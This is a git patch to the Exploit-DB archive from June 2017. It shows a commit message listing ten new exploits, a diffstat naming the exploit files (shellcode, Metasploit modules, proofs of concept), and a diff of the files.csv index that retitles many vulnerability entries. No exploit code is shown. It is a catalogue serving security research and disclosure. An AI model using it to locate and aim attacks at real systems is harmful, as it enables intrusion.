From 6ab9a26ee41ef1aff224c17e9efcad4e24364024 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 27 Jun 2017 05:01:26 +0000 Subject: [PATCH] DB: 2017-06-27 10 new exploits PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service PHP phar extension 1.1.1 - Heap Overflow PHP 'phar' Extension 1.1.1 - Heap Overflow PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write NTFS 3.1 - Master File Table Denial of Service LAME 3.99.5 - 'II_step_one' Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit PHP 5.2.3 Tidy extension - Local Buffer Overflow PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit PHP FFI Extension 5.0.5 - Local Safe_mode Bypass PHP Perl Extension - Safe_mode BypassExploit PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.x - COM functions Safe_mode and disable_function Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.2.6 - (error_log) Safe_mode Bypass PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit PHP - Safe_mode Bypass via proc_open() and custom Environment PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment PHP python extension safe_mode - Bypass Local PHP 'python' Extension - 'safe_mode' Local Bypass Exploit PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - FOpen Safe_mode Restriction-Bypass PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit JAD Java Decompiler 1.5.8e - Buffer Overflow Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure PHP 4.x - copy() Function Safe Mode Bypass PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit PHP 5.2.5 - cURL 'safe mode' Security Bypass PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit) Crypttech CryptoLog - Remote Code Execution (Metasploit) Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) Linux/x86 - Bind Shell Shellcode (75 bytes) JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit XOOPS myAds Module - (lid) SQL Injection XOOPS myAds Module - 'lid' SQL Injection PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting SmarterMail 7.x (7.2.3925) - LDAP Injection SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting SmarterMail < 7.2.3925 - LDAP Injection MaticMarket 2.02 for PHP-Nuke - Local File Inclusion PHP-Nuke MaticMarket 2.02 - Local File Inclusion WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock) phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API Eltek SmartPack - Backdoor Account --- files.csv | 116 ++++++++------- platforms/cgi/remote/42257.rb | 108 ++++++++++++++ platforms/hardware/webapps/42252.txt | 86 ++++++++++++ platforms/lin_x86/shellcode/42254.c | 98 +++++++++++++ platforms/linux/dos/42258.txt | 91 ++++++++++++ platforms/linux/dos/42259.txt | 91 ++++++++++++ platforms/linux/local/42255.py | 103 ++++++++++++++ platforms/multiple/dos/42260.py | 95 +++++++++++++ platforms/python/remote/42251.rb | 202 +++++++++++++++++++++++++++ platforms/windows/dos/42253.html | 26 ++++ platforms/windows/remote/42256.rb | 159 +++++++++++++++++++++ 11 files changed, 1122 insertions(+), 53 deletions(-) create mode 100755 platforms/cgi/remote/42257.rb create mode 100755 platforms/hardware/webapps/42252.txt create mode 100755 platforms/lin_x86/shellcode/42254.c create mode 100755 platforms/linux/dos/42258.txt create mode 100755 platforms/linux/dos/42259.txt create mode 100755 platforms/linux/local/42255.py create mode 100755 platforms/multiple/dos/42260.py create mode 100755 platforms/python/remote/42251.rb create mode 100755 platforms/windows/dos/42253.html create mode 100755 platforms/windows/remote/42256.rb diff --git a/files.csv b/files.csv index 41b4e45df..9b1704a45 100644 --- a/files.csv +++ b/files.csv @@ -1904,7 +1904,7 @@ id,file,description,date,author,platform,type,port 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 -16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 +16261,platforms/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 @@ -1956,7 +1956,7 @@ id,file,description,date,author,platform,type,port 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 -17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 +17201,platforms/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 @@ -3781,7 +3781,7 @@ id,file,description,date,author,platform,type,port 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 +29823,platforms/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 @@ -4253,7 +4253,7 @@ id,file,description,date,author,platform,type,port 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 -33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 +33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 @@ -4266,7 +4266,7 @@ id,file,description,date,author,platform,type,port 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0 -33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 +33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0 @@ -4423,11 +4423,11 @@ id,file,description,date,author,platform,type,port 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 35465,platforms/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 -35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 -35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 +35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 +35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 -35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 +35486,platforms/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 +35487,platforms/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 @@ -5589,11 +5589,15 @@ id,file,description,date,author,platform,type,port 42242,platforms/windows/dos/42242.cpp,"Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0 42243,platforms/windows/dos/42243.txt,"Microsoft Windows - Kernel ATMFD.DLL Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table",2017-06-23,"Google Security Research",windows,dos,0 42244,platforms/windows/dos/42244.cpp,"Microsoft Windows - 'nt!NtQueryInformationWorkerFactory (WorkerFactoryBasicInformation)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0 -42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0 +42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0 42246,platforms/windows/dos/42246.html,"Microsoft Edge - 'CssParser::RecordProperty' Type Confusion",2017-06-23,"Google Security Research",windows,dos,0 42247,platforms/multiple/dos/42247.txt,"Adobe Flash - AVC Edge Processing Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0 42248,platforms/multiple/dos/42248.txt,"Adobe Flash - Image Decoding Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0 42249,platforms/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",multiple,dos,0 +42253,platforms/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,windows,dos,0 +42258,platforms/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0 +42259,platforms/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0 +42260,platforms/multiple/dos/42260.py,"IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -6011,7 +6015,7 @@ id,file,description,date,author,platform,type,port 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0 -3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 +3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 @@ -6069,19 +6073,19 @@ id,file,description,date,author,platform,type,port 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 -4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0 +4080,platforms/windows/local/4080.php,"PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0 40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0 4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Escalation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 4204,platforms/windows/local/4204.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow",2007-07-20,shinnai,windows,local,0 -4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 +4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,windows,local,0 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0 -4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 +4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Buffer Overflow",2007-08-06,n00b,windows,local,0 @@ -6090,22 +6094,22 @@ id,file,description,date,author,platform,type,port 4274,platforms/windows/local/4274.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,windows,local,0 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0 -4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0 -4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 +4311,platforms/windows/local/4311.php,"PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit",2007-08-23,NetJackal,windows,local,0 +4314,platforms/windows/local/4314.php,"PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit",2007-08-25,NetJackal,windows,local,0 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Privilege Escalation",2007-08-27,Inphex,windows,local,0 4345,platforms/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0 -4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 +4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit",2007-09-10,"Mattias Bengtsson",multiple,local,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0 -4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 +4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0 -4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions Safe_mode and disable_function Bypass",2007-10-22,shinnai,windows,local,0 +4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0 4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL 